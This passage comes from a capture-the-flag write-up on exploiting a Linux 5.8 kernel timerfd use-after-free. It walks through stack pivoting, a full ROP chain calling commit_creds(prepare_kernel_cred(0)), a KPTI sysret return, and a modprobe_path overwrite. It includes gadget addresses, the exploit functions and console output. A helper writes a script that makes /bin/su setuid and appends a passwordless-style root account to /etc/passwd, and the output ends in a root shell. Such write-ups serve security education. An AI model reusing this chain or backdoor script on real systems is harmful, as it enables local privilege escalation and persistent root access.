    00e0  0x0000000000000000    0x0000000000000000    
    general protection fault: 0000 [#1] PTI
    CPU: 0 PID: 66 Comm: exploit Tainted: G           O      5.8.3 #12          
    RIP: 0010:0x4141414141414141 // [2]
    Code: Bad RIP value.
    RSP: 0018:ffffc90000003f18 EFLAGS: 00000006
    [...]

As expected, by overwriting the timerfd_tmrproc() pointer [1] we get RIP control when the timer fires [2]. Now we need to create a ROP chain and perform stack pivoting.

It’s time to use GDB: we are interested in the CPU context when timerfd_tmrproc() is called. We need one of the registers to contain a pointer to a controllable location: here we will place our fake stack address.

Let’s comment out the following line in our PoC:

((unsigned long *)(buff))[0x5] = 0x4141414141414141;

Now we can attach GDB to the kernel and set a breakpoint on timerfd_tmrproc().

When the timer expires, timerfd_tmrproc() is executed and the breakpoint is hit. From the CPU context, we can see that RDI contains 0xffff88800029bc00, the address of the timerfd_ctx object:

In red, we can see the address of the structure itself, in green timerfd_tmrproc:

Since RDI points to the timerfd_ctx structure, and we have full control over its first field, we can store the address of our fake stack there (remember that the fake stack can be mapped in user space because SMAP is not enabled):

void *fake_stack = mmap((void *)0xcafe000, PAGE_SIZE*5, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_POPULATE|MAP_PRIVATE, 0, 0);

Then, the following gadget can be used to perform stack pivoting:

0xffffffff81027b86: mov esp, dword ptr [rdi]; lea rax, [rax + rsi*8]; ret;
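
The gadget loads only the low 32 bits of the object's first qword into ESP, and on x86-64 a write to a 32-bit register zero-extends into the full 64-bit register. This is why the fake stack has to be mapped below 4 GiB. The following is a minimal user-space model of that arithmetic, not kernel code; pivot_rsp and rsp_after_ret are names made up for this illustration:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Model of `mov esp, dword ptr [rdi]`: only the low 32 bits of the first
 * qword are loaded, and the upper half of RSP is cleared (zero-extension). */
static uint64_t pivot_rsp(const uint64_t *ctx)
{
    assert(ctx != NULL);
    return (uint64_t)(uint32_t)ctx[0];
}

/* Model of the trailing `ret`: it pops 8 bytes, so RSP advances by 8. */
static uint64_t rsp_after_ret(uint64_t rsp)
{
    return rsp + 8;
}
```

With the first qword set to 0xcafe800, the model gives RSP = 0xcafe800 after the load and 0xcafe808 after the first ret. A kernel heap pointer such as 0xffff88800029b600 would be truncated to 0x29b600, so leaving the original value in place would not give a usable stack.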

We can make the following changes in the page_fault_handler() function:

[...]
void *fake_stack = mmap((void *)0xcafe000, PAGE_SIZE*5, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_POPULATE|MAP_PRIVATE, 0, 0);

((unsigned long *)(buff))[0x0] = (unsigned long)(fake_stack + 0x800);
((unsigned long *)(buff))[0x3] = 0x000000000eae0e65;
((unsigned long *)(buff))[0x4] = 0x000000000eae0e65;
((unsigned long *)(buff))[0x5] = (unsigned long)(pivot);

unsigned long *rop = (unsigned long *)(fake_stack + 0x800);

*rop ++= 0x4242424242424242;
[...]

And execute the exploit again:

    / $ /home/user/poc
    [*] Allocating/Freeing timerfd_ctx structure...
    [*] Leaking timerfd_tmrproc address...
    [+] Object dump:
        0000  0xffff88800029b600    0x0000000000000000      
        0010  0x0000000000000000    0x00000002f21b349d      
        0020  0x00000002f21b349d    0xffffffff81102a00      
        0030  0xffffffff8183e080    0x0000000000000000      
        0040  0x0000000000000000    0x0000000000000000      
        0050  0x0000000000000000    0x0000000000000000      
        0060  0x0000000000000000    0x0000000000000000      
        0070  0x0000000000000000    0x0000000000000000      
        0080  0xbd74d3bf6c2aab81    0xffff88800029b688      
        0090  0xffff88800029b688    0x0000000000000000      
        00a0  0x0000000000000000    0xffff88800013f000      
        00b0  0x00000000000000a8    0x0000000000000000      
        00c0  0x0000000000000000    0x0000000000000000      
        00d0  0x0000000000000000    0x0000000000000000      
        00e0  0x0000000000000000    0x0000000000000000    
    [+] Leaked timerfd_ctx structure address: 0xffff88800029b600
    [+] Leaked timerfd_tmrproc address: 0xffffffff81102a00
    [+] Kernel base address: 0xffffffff00000000
    [*] Mmapping page...
    [*] Start monitoring range: 0xdead000 - 0xdeae000
    [*] Triggering page fault...
    [+] Page fault at address 0xdead000!
    [*] Freeing...
    [*] Creating second timer...
    [*] Structure will be overwritten with:
        0000  0x000000000cafe800    0x0000000000000000      
        0010  0x0000000000000000    0x000000000eae0e65      
        0020  0x000000000eae0e65    0xffffffff81027b86      
        0030  0xffffffff8183e080    0x0000000000000000      
        0040  0x0000000000000000    0x0000000000000000      
        0050  0x0000000000000000    0x0000000000000000      
        0060  0x0000000000000000    0x0000000000000000      
        0070  0x0000000000000000    0x0000000000000000      
        0080  0xbd70d3bf6c2aaa81    0xffff88800029b288      
        0090  0xffff88800029b288    0x0000000000000000      
        00a0  0x0000000000000000    0xffff88800013fb00      
        00b0  0x00000000000000a8    0x0000000000000000      
        00c0  0x0000000000000000    0x0000000000000000      
        00d0  0x0000000000000000    0x0000000000000000      
        00e0  0x0000000000000000    0x0000000000000000    
    general protection fault: 0000 [#1] PTI
    CPU: 0 PID: 66 Comm: exploit Tainted: G           O      5.8.3 #12
    RIP: 0010:0x4242424242424242 // [1]
    Code: Bad RIP value.
    RSP: 0018:000000000cafe808 EFLAGS: 00000006 // [2]
    [...]

Success! After stack pivoting, we have overwritten RIP with a bunch of “B”s [1], and RSP now contains 0xcafe808 [2]. It’s time to finalize our ROP chain!

The Exploit - From “B”s To Root Shell

As a first attempt, let’s try to read the flag. We can extend the ROP chain to replicate the effect of commit_creds(prepare_kernel_cred(0)).

In Linux, every task has its own set of credentials, defined by the cred structure, which specifies the security context of the task.

prepare_kernel_cred() allocates a new set of credentials with uid, gid, etc. set to 0, and commit_creds() applies it to the current task. This way we get root privileges.

Then we need to change bit 12 of the CR3 register to switch back to the user page tables (remember that KPTI is enabled), use swapgs to swap GS back to the user GS base saved in an MSR, and then use iretq to return to user space.

We can do it in different ways. For example we can use the symbol swapgs_restore_regs_and_return_to_usermode. Using GDB we can see that swapgs_restore_regs_and_return_to_usermode + 0x16 is a perfect gadget for us:

We can find similar instructions when the system returns to user space after a syscall:

The only difference is that the first gadget utilizes iretq, the second one sysretq instead:

iretq expects the following stack layout when returning to user space:

    +-------------------+
    |        RIP        |
    +-------------------+
    |        CS         |
    +-------------------+
    |       RFLAGS      |
    +-------------------+
    |        RSP        |
    +-------------------+
    |        SS         |
    +-------------------+

sysretq accepts user space RIP from RCX and RFLAGS from R11 instead.
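
To make the iretq layout concrete, here is a minimal sketch that appends such a frame to a ROP chain. It is only an illustration: push_iretq_frame and its parameter names are hypothetical, and the chain used later in this article takes the sysretq path instead.

```c
#include <assert.h>
#include <stddef.h>

/* Append the five values iretq pops, lowest address first:
 * RIP, CS, RFLAGS, RSP, SS. Returns the next free slot in the chain. */
static unsigned long *push_iretq_frame(unsigned long *rop,
                                       unsigned long user_rip,
                                       unsigned long user_cs,
                                       unsigned long user_rflags,
                                       unsigned long user_rsp,
                                       unsigned long user_ss)
{
    assert(rop != NULL);
    *rop++ = user_rip;    /* where execution resumes in user space */
    *rop++ = user_cs;     /* user code segment selector */
    *rop++ = user_rflags; /* flags restored on return */
    *rop++ = user_rsp;    /* user stack pointer */
    *rop++ = user_ss;     /* user stack segment selector */
    return rop;
}
```

The selector and flag values would come from the saved processor state, together with the address of a user-space function and a pointer into a mapped user stack.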

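We can save the current processor state using the following function (it is written in Intel operand order, so it assumes the exploit is built with Intel-syntax inline assembly, e.g. GCC's -masm=intel option):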

static void save_state()
{
    __asm__ __volatile__(
    "movq %0, cs;"
    "movq %1, ss;"
    "pushfq;"
    "popq %2;"
    : "=r" (usr_cs), "=r" (usr_ss), "=r" (usr_rflags) : : "memory" );
}

And read the flag with:

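void read_flag()
{
    char flag[100] = {0}; // zero-filled so puts() always finds a terminator
    int fd = open("/flag", O_RDONLY);

    // Read at most 99 bytes so the last byte stays NUL
    if (fd >= 0 && read(fd, flag, sizeof(flag) - 1) > 0)
        puts(flag);
}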

I chose the second gadget (the sysretq one) to return to user space. Here is what the ROP chain looks like:

*rop ++= kernel_base + 0xffffffff810b689dUL; // pop rdi; ret;
*rop ++= 0;
*rop ++= kernel_base + 0xffffffff81053680UL; // prepare_kernel_cred
*rop ++= kernel_base + 0xffffffff8108bacaUL; // mov rdi, rax; call 0x2d1350; mov rax, -9; pop rbp; ret;
*rop ++= 0; // rbp
*rop ++= kernel_base + 0xffffffff810537d0UL; // commit_creds
*rop ++= kernel_base + 0xffffffff8118a8d3UL; // pop rcx; ret;
*rop ++= (unsigned long)(read_flag);
*rop ++= kernel_base + 0xffffffff81008b7dUL; // pop r11; pop r12; pop rbp; ret;
*rop ++= usr_rflags;
*rop ++= 0; // r12
*rop ++= 0; // rbp
*rop ++= kernel_base + 0xffffffff81200106UL; // kpti_trampoline (sysret)
*rop ++= 0; // rax
*rop ++= 0; // rdi
*rop ++= (unsigned long)(fake_stack + 0x1000); // rsp

Let’s test the modified exploit:

    / $ /home/user/poc3
    [*] Allocating/Freeing timerfd_ctx structure...
    [*] Leaking timerfd_tmrproc address...
    [+] Object dump:
        0000  0xffff88800029b800    0x0000000000000000      
        0010  0x0000000000000000    0x00000002de088cb1      
        0020  0x00000002de088cb1    0xffffffff81102a00      
        0030  0xffffffff8183e080    0x0000000000000000      
        0040  0x0000000000000000    0x0000000000000000      
        0050  0x0000000000000000    0x0000000000000000      
        0060  0x0000000000000000    0x0000000000000000      
        0070  0x0000000000000000    0x0000000000000000      
        0080  0xbd7ad3bf6c2aae81    0xffff88800029b888      
        0090  0xffff88800029b888    0x0000000000000000      
        00a0  0x0000000000000000    0xffff888000157600      
        00b0  0x00000000000000a8    0x0000000000000000      
        00c0  0x0000000000000000    0x0000000000000000      
        00d0  0x0000000000000000    0x0000000000000000      
        00e0  0x0000000000000000    0x0000000000000000    
    [+] Leaked timerfd_ctx structure address: 0xffff88800029b800            
    [+] Leaked timerfd_tmrproc address: 0xffffffff81102a00
    [+] Kernel base address: 0xffffffff00000000
    [*] Mmapping page...
    [*] Start monitoring range: 0xdead000 - 0xdeae000
    [*] Triggering page fault...
    [+] Page fault at address 0xdead000!
    [*] Freeing...
    [*] Creating second timer...
    [*] Structure will be overwritten with:
        0000  0x000000000cafe800    0x0000000000000000      
        0010  0x0000000000000000    0x000000000eae0e65      
        0020  0x000000000eae0e65    0xffffffff81027b86      
        0030  0xffffffff8183e080    0x0000000000000000      
        0040  0x0000000000000000    0x0000000000000000      
        0050  0x0000000000000000    0x0000000000000000      
        0060  0x0000000000000000    0x0000000000000000      
        0070  0x0000000000000000    0x0000000000000000      
        0080  0xbd7ad3bf6c2aae81    0xffff88800029b888      
        0090  0xffff88800029b888    0x0000000000000000      
        00a0  0x0000000000000000    0xffff888000157600      
        00b0  0x00000000000000a8    0x0000000000000000      
        00c0  0x0000000000000000    0x0000000000000000      
        00d0  0x0000000000000000    0x0000000000000000      
        00e0  0x0000000000000000    0x0000000000000000    
    CUCTF{TEST} // [1]

    BUG: unable to handle page fault for address: 00000001034cc473
    #PF: supervisor instruction fetch in kernel mode
    [...]

The kernel crashed, but we successfully read the flag [1]. Cool, but it’s not enough. We want a shell!

Initially I tried to replace the read_flag() function with:

static void execve_shell(void)
{
    if (getuid() != 0)
    {
        puts("[ERROR] We are not root!");
        exit(1);
    }

    puts("[+] We are root!");
    execve("/bin/sh", 0, 0);
}

Unfortunately, I could not get it to work, but after spending some time experimenting, I found an alternative approach to get a shell.

First, we need to fix the timerfd_ctx structure we corrupted in the previous steps. I replaced the first qword with the original timerfd_ctx address and the sixth qword (index 0x5, now overwritten by the stack pivot gadget) with the address of this gadget:

0xffffffff810001dc: ret;

So when the function pointer is called again, the call will simply return.

// Fix idx 0x0
*rop ++= kernel_base + 0xffffffff81027b8eUL; // mov rax, rdi; ret;
*rop ++= kernel_base + 0xffffffff8106e24aUL; // mov rsi, rax; sub rsi, rcx; cmp rdx, rax; cmovs r8, rsi; mov rax, r8; ret;
*rop ++= kernel_base + 0xffffffff81027b8eUL; // mov rax, rdi; ret;
*rop ++= kernel_base + 0xffffffff810f6180UL; // mov qword ptr [rax], rsi; ret;

// Fix idx 0x5
*rop ++= kernel_base + 0xffffffff8113f9b6UL; // pop rdx; ret;
*rop ++= 0x28;
*rop ++= kernel_base + 0xffffffff81012183UL; // add rax, rdx; ret;
*rop ++= kernel_base + 0xffffffff81005b00UL; // pop rsi; ret;
*rop ++= kernel_base + 0xffffffff810001dcUL; // ret;
*rop ++= kernel_base + 0xffffffff810f6180UL; // mov qword ptr [rax], rsi; ret;

Even after these changes, I could not use execve, execveat, etc., so I opted for a different strategy.

In Linux, when a user executes a program with an unknown program header, the system calls __request_module(), which in turn calls call_modprobe(). call_modprobe() uses call_usermodehelper_exec() to execute the program specified by modprobe_path, which is set by default to /sbin/modprobe.

If we overwrite modprobe_path with the location of a malicious program, for example /home/user/x, every time a file with an unknown program header is executed, the system will run our script with root privileges.

We can use the following function to automatically create a file with an unknown program header, /home/user/asd, and a script, /home/user/x, that makes /bin/su setuid and adds a new root user:

void prepare_exploit()
{
    system("echo -e '\xdd\xdd\xdd\xdd\xdd\xdd' > /home/user/asd");
    system("chmod +x /home/user/asd");
    system("echo '#!/bin/sh' > /home/user/x");
    system("echo 'chmod +s /bin/su' >> /home/user/x");
    system("echo 'echo \"asd:12prjwbMKCxIE:0:0:asd:/root:/bin/sh\" >> /etc/passwd' >> /home/user/x");
    system("chmod +x /home/user/x");
}
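
prepare_exploit() shells out through system() for every line. As an alternative sketch, which is not what the original exploit does, the same kind of file could be written directly with open() and write(). write_executable is a hypothetical helper name introduced only for this example:

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <fcntl.h>
#include <stddef.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Create (or truncate) `path`, write `len` bytes of `data` into it and make
 * it executable. Returns 0 on success, -1 on any error. */
static int write_executable(const char *path, const void *data, size_t len)
{
    assert(path != NULL && data != NULL);

    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0755);
    if (fd < 0)
        return -1;

    ssize_t written = write(fd, data, len);
    /* fchmod() sets the mode explicitly, independent of the process umask. */
    int rc = (written == (ssize_t)len && fchmod(fd, 0755) == 0) ? 0 : -1;

    close(fd);
    return rc;
}
```

Calling it once with the six 0xdd bytes for /home/user/asd and once with the script text for /home/user/x would produce files equivalent to the ones created by prepare_exploit().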

Now we can modify the ROP chain to overwrite modprobe_path using a write-what-where gadget:

// Hijack modprobe_path
*rop ++= kernel_base + 0xffffffff810b689dUL; // pop rdi; ret;
*rop ++= 0x73752f656d6f682f; // su/emoh/
*rop ++= kernel_base + 0xffffffff81005b00UL; // pop rsi; ret;
*rop ++= kernel_base + 0xffffffff81837c20UL; // modprobe_path
*rop ++= kernel_base + 0xffffffff810a5417UL; // mov qword ptr [rsi], rdi; ret;

*rop ++= kernel_base + 0xffffffff810b689dUL; // pop rdi; ret;
*rop ++= 0x782f7265; // x/re
*rop ++= kernel_base + 0xffffffff81005b00UL; // pop rsi; ret;
*rop ++= kernel_base + 0xffffffff81837c20UL + 8UL; // modprobe_path + 8
*rop ++= kernel_base + 0xffffffff810a5417UL; // mov qword ptr [rsi], rdi; ret;
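
The two immediates in this chain are simply the bytes of "/home/user/x" read as little-endian 64-bit words; the zero bytes in the upper half of the second word act as the string terminator. A small helper can compute such words for any short path. This is a sketch that assumes a little-endian host, and pack_path is a hypothetical name that is not part of the original exploit:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Copy `path` (including its NUL terminator) into zero-padded 64-bit words,
 * laid out exactly as the bytes will sit in memory. Assumes a little-endian
 * host, like the x86-64 target. Returns the number of words used. */
static size_t pack_path(const char *path, uint64_t *words, size_t max_words)
{
    size_t len = strlen(path) + 1; /* keep the terminator */
    size_t used = (len + 7) / 8;   /* round up to whole qwords */

    assert(used <= max_words);
    memset(words, 0, used * sizeof(uint64_t));
    memcpy(words, path, len);
    return used;
}
```

For "/home/user/x" this yields two words, 0x73752f656d6f682f and 0x782f7265, which are the values popped into RDI above.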

Now we only need to find a way to prevent the kernel from crashing after returning to user space. Surprisingly, I was able to restore execution by returning to this function:

static void do_nothing(void) { return; }

This way, after hijacking modprobe_path, our exploit exits cleanly and we can execute /home/user/asd to force the kernel to run our malicious script. I also tried to trap the thread with int3 and it worked too.

The last part of the chain, which now returns to do_nothing(), looks like this:

// pkc -> cc -> kpti trampoline -> user space -> ret
*rop ++= kernel_base + 0xffffffff810b689dUL; // pop rdi; ret;
*rop ++= 0;
*rop ++= kernel_base + 0xffffffff81053680UL; // prepare_kernel_cred
*rop ++= kernel_base + 0xffffffff8108bacaUL; // mov rdi, rax; call 0x2d1350; mov rax, -9; pop rbp; ret;
*rop ++= 0; // rbp
*rop ++= kernel_base + 0xffffffff810537d0UL; // commit_creds
*rop ++= kernel_base + 0xffffffff8118a8d3UL; // pop rcx; ret;
*rop ++= (unsigned long)(do_nothing); // return
*rop ++= kernel_base + 0xffffffff81008b7dUL; // pop r11; pop r12; pop rbp; ret;
*rop ++= usr_rflags;
*rop ++= 0; // r12
*rop ++= 0; // rbp
*rop ++= kernel_base + 0xffffffff81200106UL; // kpti_trampoline (sysret)
*rop ++= 0; // rax
*rop ++= 0; // rdi
*rop ++= (unsigned long)(fake_stack + 0x1000); // rsp

It is worth noting that, to maximize the exploit success rate, we need precise timing. I found the right compromise using sleep(1) before ioctl_userfaultfd(). Why is it needed? Well, no clue, I still have to dig deeper.

This will be our final exploit: exploit.c, utils.h

    / $ /home/user/exploit
    [*] Allocating/Freeing timerfd_ctx structure...
    [*] Leaking timerfd_tmrproc address...
    [+] Object dump:
        0000  0xffff88800029b600    0x0000000000000000      
        0010  0x0000000000000000    0x00000002dc1b84cb      
        0020  0x00000002dc1b84cb    0xffffffff81102a00      
        0030  0xffffffff8183e080    0x0000000000000000      
        0040  0x0000000000000000    0x0000000000000000      
        0050  0x0000000000000000    0x0000000000000000      
        0060  0x0000000000000000    0x0000000000000000      
        0070  0x0000000000000000    0x0000000000000000      
        0080  0xbd74d3bf6c2aaa81    0xffff88800029b688      
        0090  0xffff88800029b688    0x0000000000000000      
        00a0  0x0000000000000000    0xffff888000157f00      
        00b0  0x00000000000000a8    0x0000000000000000      
        00c0  0x0000000000000000    0x0000000000000000      
        00d0  0x0000000000000000    0x0000000000000000      
        00e0  0x0000000000000000    0x0000000000000000    
    [+] Leaked timerfd_ctx structure address: 0xffff88800029b600            
    [+] Leaked timerfd_tmrproc address: 0xffffffff81102a00
    [+] Kernel base address: 0xffffffff00000000
    [+] Modprobe path address: 0xffffffff81837c20
    [*] Mmapping page...
    [*] Start monitoring range: 0xdead000 - 0xdeae000
    [*] Triggering page fault...
    [+] Page fault at address 0xdead000!
    [*] Freeing...
    [*] Creating second timer...
    [*] Structure will be overwritten with:
        0000  0x000000000cafe800    0x0000000000000000      
        0010  0x0000000000000000    0x000000000eae0e65      
        0020  0x000000000eae0e65    0xffffffff81027b86      
        0030  0xffffffff8183e080    0x0000000000000000      
        0040  0x0000000000000000    0x0000000000000000      
        0050  0x0000000000000000    0x0000000000000000      
        0060  0x0000000000000000    0x0000000000000000      
        0070  0x0000000000000000    0x0000000000000000      
        0080  0xbd74d3bf6c2aaa81    0xffff88800029b688      
        0090  0xffff88800029b688    0x0000000000000000      
        00a0  0x0000000000000000    0xffff888000157f00      
        00b0  0x00000000000000a8    0x0000000000000000      
        00c0  0x0000000000000000    0x0000000000000000      
        00d0  0x0000000000000000    0x0000000000000000      
        00e0  0x0000000000000000    0x0000000000000000    
    [*] Fake stack at: 0xcafe000
    [+] Execute: "/home/user/asd" to add a new user: asd / asdasdasd
    / $ cat /etc/passwd
    root:x:0:0:root:/root:/bin/sh
    user:x:1000:1000:Linux User,,,:/home/user:/bin/sh
    / $ /home/user/asd
    /home/user/asd: line 1: ������: not found
    / $ cat /etc/passwd
    root:x:0:0:root:/root:/bin/sh
    user:x:1000:1000:Linux User,,,:/home/user:/bin/sh
    asd:12prjwbMKCxIE:0:0:asd:/root:/bin/sh
    / $ su asd
    Password:
    / # id
    uid=0(root) gid=0(root) groups=0(root)
    / #

Finally, we can enjoy our root shell!

The challenge can be found here.
